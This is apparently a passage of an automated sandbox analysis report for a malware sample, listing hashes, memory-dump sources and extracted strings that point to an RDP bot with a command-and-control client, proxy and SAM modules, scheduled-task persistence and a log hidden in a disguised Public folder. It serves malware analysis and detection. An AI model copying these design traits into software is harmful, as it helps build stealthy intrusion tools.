                    • Opcode Fuzzy Hash: d839c0b84da7d548b6246506d3ca82f80e2902c7096f5b9e2af1ea17af3298de
                    • Instruction Fuzzy Hash: 9551D431A08A4285E7284BADE8423B96B60AB407FCF146331DB7D476E9EF3DA5458700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                    • API String ID: 1004003707-2349658452
                    • Opcode ID: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                    • Instruction ID: 21cd5ac7ce71f56e562ba2d11933e912f2d0d3376197eff1f41c74a6f014f883
                    • Opcode Fuzzy Hash: 15574e2c6d2e1fb85edecffd2d2a439210e27da6631c3faf606f44d1bffa9230
                    • Instruction Fuzzy Hash: 96413861A09687A6FB108BC8E924BF8B361BF047C8F845532EB4D06595DF7CFA66C700
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$cnccli$ini_get_var$server_host
                    • API String ID: 1004003707-2347851921
                    • Opcode ID: cf1616aad114c9908ff762f9604715a07226b35ad3038edca240e245e72a8459
                    • Instruction ID: f07e5cbd02b9b3525c4274db3b98549f494a0c24a44b145ed91f2e8310ea8dab
                    • Opcode Fuzzy Hash: cf1616aad114c9908ff762f9604715a07226b35ad3038edca240e245e72a8459
                    • Instruction Fuzzy Hash: 814136E1A09647A1FA519F98ED007F46360FB843D8F889432EB4D475A6DF3CE949C304
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                    • API String ID: 1004003707-2349658452
                    • Opcode ID: 002b80f4f3ddb5d95a8a589fbe732dd8bd41aee7437ac21d3b594941e9e699d2
                    • Instruction ID: 287578aa2a21f6dc6dcee38bb3bcc506b3ec7063b81699f57fea1b51d8e784ba
                    • Opcode Fuzzy Hash: 002b80f4f3ddb5d95a8a589fbe732dd8bd41aee7437ac21d3b594941e9e699d2
                    • Instruction Fuzzy Hash: 214128A1F086C7A6FA128F98E9507F42361AF043C8F554536EB4D46596EF7CFA49E300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmp
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var$main$version
                    • API String ID: 1004003707-2349658452
                    • Opcode ID: 487e31b225751ea3932902563ad00909ebac7d89d154fe2b6fceb74eda358456
                    • Instruction ID: 9b0912578886116a81987c5c4c44bf5b6750102ee600f4478cc9fca2ba00daaa
                    • Opcode Fuzzy Hash: 487e31b225751ea3932902563ad00909ebac7d89d154fe2b6fceb74eda358456
                    • Instruction Fuzzy Hash: D9414BA2A19AC796FA248F4CE9803F46360BF443C8F554536EB6D46196DF7CEA46F300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmp
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                    • API String ID: 1004003707-693788558
                    • Opcode ID: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                    • Instruction ID: 742dd8ba5f68486097fb4edf1a5f10ad994634536fe86cb358ed1482fa22ede2
                    • Opcode Fuzzy Hash: 0b5434fd82731331c32f89b55454895718f2443e3b4546f6be8949ec3718175f
                    • Instruction Fuzzy Hash: 0F412A61A09687A1FA209FD9F960BB8B360BF507C9F445136EB4D0A595DF3CFA96C300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$cnccli$ini_get_sec$server_host
                    • API String ID: 1004003707-1509792781
                    • Opcode ID: cec21c9f73427ec2da6491224bd564f2f11f16dbc1f39dfadc49aebaa499689f
                    • Instruction ID: 660eefcef5034ac8e8b39a72640d4d9cc1f1a02ce92b75d51c5e348403d12047
                    • Opcode Fuzzy Hash: cec21c9f73427ec2da6491224bd564f2f11f16dbc1f39dfadc49aebaa499689f
                    • Instruction Fuzzy Hash: 2541EBE2A0964795FA209FD8E8417F46350AF843D8F888536DB4D5B5E6DF3DE58AC300
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmp
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: strcmp
                    • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$H:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec$main$version
                    • API String ID: 1004003707-693788558
                    • Opcode ID: f3b89cb6aefd98be79687eaabfb69af6a5614a3a306acbc797dd2fc7ffb4115a
                    • Instruction ID: fb7dab05c66821b3b72e5ff386bbbd29d16671e27b3e38712a75eed6b50636a7
                    • Opcode Fuzzy Hash: f3b89cb6aefd98be79687eaabfb69af6a5614a3a306acbc797dd2fc7ffb4115a
                    • Instruction Fuzzy Hash: 94414962F086C7A6FA528F58E9417F82351AF007C8F458536DB4D1A596DF3DF986E300
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                    • Instruction ID: 6af90cc4b8b3021cbfa118ed8a0c5d89c4f2d72fedbe9bc540b588d1d096dc21
                    • Opcode Fuzzy Hash: 4940b5da95d0ae020ec3bfee3c5667328d6dcc69be74491bcb0805f1be78f140
                    • Instruction Fuzzy Hash: 56310CA2E09607A1FE519BDDE8603B97362AF44BC4F588435DA4E1B7A1EE3CF8558340
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                    • Instruction ID: 5b66072a1bff8190818ed39ff715ad96b81ae6efc3ba16493f5d8e0044077d6f
                    • Opcode Fuzzy Hash: 355508e66cb6e762a7e8849211fc4bc2e8f7dfbd30af042564a4fb98cc735545
                    • Instruction Fuzzy Hash: 1E310E61F0961791FE109F8DE8407B52791AF84FC5F989535CB4E473A6EE2CA945C340
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                    • Instruction ID: 799effd68652332ccc69ce4f3674460035339f01548c6f7b314710808e2707e1
                    • Opcode Fuzzy Hash: 27a32a85cc346afb59106e55f512f4edb1a767274d0ae344b874c7e539677345
                    • Instruction Fuzzy Hash: D1311764E09A9385FA129F1DE8603B52361AF44BC4F9AC435DB4D1B2A4EF6CF985F300
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 95db56508a070af681d481542748a3197114f80687e374468034128ed152e278
                    • Instruction ID: 19947cbe8e0dcef0503f328d5567c7c38baed407738b4202035a7d22951c7aae
                    • Opcode Fuzzy Hash: 95db56508a070af681d481542748a3197114f80687e374468034128ed152e278
                    • Instruction Fuzzy Hash: 07310A60A0D603D1FA619B9DECA03B62351BF46BD4F4490B6DE4D4B2B4EF2CAB49C301
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSection$AllocEnterLeaveProcess
                    • String ID: (handler != NULL)$H:/Projects/rdp/bot/codebase/ebus.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(handler=0x%p,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(handler=0x%p)$ebus_subscribe$mem_alloc
                    • API String ID: 285244410-3859226547
                    • Opcode ID: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                    • Instruction ID: ad2bfea5774450aa2002049a40baa09234ccdd700e424db7ae88bcff5981aac5
                    • Opcode Fuzzy Hash: 927ebebcac4c7bf28bae6e4b1e331234b1c0fbf7e3075d44c0c1b5d0e5bf19a7
                    • Instruction Fuzzy Hash: D5314169E0DA8781FA549F4CE8807746352AF45BD4FA98031DB0D473A5EF2CE946F390
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_proxies) failed(gle=%lu)$[I] (%s) -> %s$proxy_init$~
                    • API String ID: 3179112426-3318474754
                    • Opcode ID: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                    • Instruction ID: 86d01740d5396e5df4845fb854c92d21b9e2246347f93b25eb4ff050f73164ba
                    • Opcode Fuzzy Hash: 3bf602e0163212c75ed81c57b8ccc5374dcd8ffabe5220b955216cce5e13afa9
                    • Instruction Fuzzy Hash: 8331D650E1C68382FB215F5CA4C03B86294AF063E4F664932C75E462B3DE5DBD85B322
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: CountCriticalErrorInitializeLastSectionSpinfflushfwrite
                    • String ID: $Done$P$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_sam) failed(gle=%lu)$[I] (%s) -> %s$sam_init$~
                    • API String ID: 3179112426-2019511216
                    • Opcode ID: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                    • Instruction ID: 314d58a39b00f78a14d885fedfcd0eb8c61d4e20236455cca1c6c31ad79b8b6f
                    • Opcode Fuzzy Hash: bc9b366e1df2dffc722dcc5d192f50d0005bfb0d33aee01d23c5aa0be7fbb622
                    • Instruction Fuzzy Hash: 1F31E960E0C78782FB215F1CA4D83BD22629F043C4FA65536D70E462A1DE7EB985F751
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: strlen$strcpy
                    • String ID: *$schtasks
                    • API String ID: 2790333442-2394224502
                    • Opcode ID: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                    • Instruction ID: aed607c36184697332da19e459bb665b18b17adbd25dc08a134b4b8d12dbeab1
                    • Opcode Fuzzy Hash: 49773f8b016588153e9639c0d4cdf904ddd36bceb3f1ef689c3b893e88a01043
                    • Instruction Fuzzy Hash: 6A51B422A4C683CAF7719A9DAC953BE5251AB963C4F4800B5EF4E473E6DE7DDB048700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
                    • String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
                    • API String ID: 3537583691-1494920791
                    • Opcode ID: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                    • Instruction ID: 28e51d95f12ae4c178f091e5892c249e49ac5703b15a57fdf357aa5003566d2e
                    • Opcode Fuzzy Hash: d542514265604fe80ee2d18cc6880337692ea211fc3233fba6a32265b22876f4
                    • Instruction Fuzzy Hash: A1419A62A08B4286EB188F99E85667A67A0FB44BCCF446035DF0D43796EE3CE489C700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
                    • String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
                    • API String ID: 513531256-4171087551
                    • Opcode ID: 3aa85008c737a7422c3167a565b94840adc05c6d64a34166f4daf9ff1a3abf69
                    • Instruction ID: 9d2a3bb88da730f062ef7a2f57ce0887d08487f59c0ac2e4a3c20e336e04a467
                    • Opcode Fuzzy Hash: 3aa85008c737a7422c3167a565b94840adc05c6d64a34166f4daf9ff1a3abf69
                    • Instruction Fuzzy Hash: B0416B21A6C64286F320FB15EC55BAAE6A1FF88B84FC40031DA4D577D5CF3CE5A18768
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                    • Instruction ID: b0de49f1424ae57908a201f7c79efa8160a963368e0d18f1f08b488ea54e4b06
                    • Opcode Fuzzy Hash: 13a4dc5d4aef767626a2686ae3962c350040e320f9c49377ac2aaf778c88b94f
                    • Instruction Fuzzy Hash: 5F217C62A09A86A5E7119F99FC50BAA7365FB447C4F444032EF4C47764DF3CE995C700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 86f798423a90631b684bbec975e772917ddb9f341768e14ebb927b92ead05de6
                    • Instruction ID: 1b2a34692f54fe5f1fdebf2969dc601f2bd5b56e31d2b2d2b822f3f7aca0edf6
                    • Opcode Fuzzy Hash: 86f798423a90631b684bbec975e772917ddb9f341768e14ebb927b92ead05de6
                    • Instruction Fuzzy Hash: EE217CA2A09A4696E6519F9DFC407AA73A0FB887D4F848036EF4C477A5DF3CE945C700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 58423ba29739921012416d05e5dbc1509c7eb61d3be863f7a2f3912cda20af73
                    • Instruction ID: ba875c8e43ea3cc856875f75497227ea4a52b77d27b5d8b1ba02779c9c239d61
                    • Opcode Fuzzy Hash: 58423ba29739921012416d05e5dbc1509c7eb61d3be863f7a2f3912cda20af73
                    • Instruction Fuzzy Hash: 1A21AB62A08BC396E6129F1CF8407AA3765BB857C8F454032EF8C47665DF3CE985E700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 591d9c77f18678ec0f49fccd3905a1aec4a9850be8c5e59c2f1693f793faafe9
                    • Instruction ID: 46f0709e31955beeb25d233a29e29e87e7fe66cbad7768e47212928abf92e3c6
                    • Opcode Fuzzy Hash: 591d9c77f18678ec0f49fccd3905a1aec4a9850be8c5e59c2f1693f793faafe9
                    • Instruction Fuzzy Hash: 56219161A08A4699E3159F99FC827AA3768BB487CCF445132EF4C47765DF3DD889C700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: b301655ed76bfcb65bf27385b654fd88f5a2592561199eef133ef872ace53a75
                    • Instruction ID: bf5530aeffd1650932a01a8f9068287ecfac999aba1bbe44d7e28cb4232bd1e1
                    • Opcode Fuzzy Hash: b301655ed76bfcb65bf27385b654fd88f5a2592561199eef133ef872ace53a75
                    • Instruction Fuzzy Hash: 6C214B2160CA43DAE6619F99EC807AA73A4FB467C8F444172EF4D47664DF3CEA89C700
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: _errno$_strtoui64
                    • String ID: (value != NULL)$H:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
                    • API String ID: 3513630032-2069802722
                    • Opcode ID: 7feb5f99be34bff91d77dfd5db5aa2204c62c6314b7ac8121db4399c85ba9e29
                    • Instruction ID: fb7d2605498d6a04d36d5840b025d926639e05d7b175cbdbc1f31ad4bcf1e0b0
                    • Opcode Fuzzy Hash: 7feb5f99be34bff91d77dfd5db5aa2204c62c6314b7ac8121db4399c85ba9e29
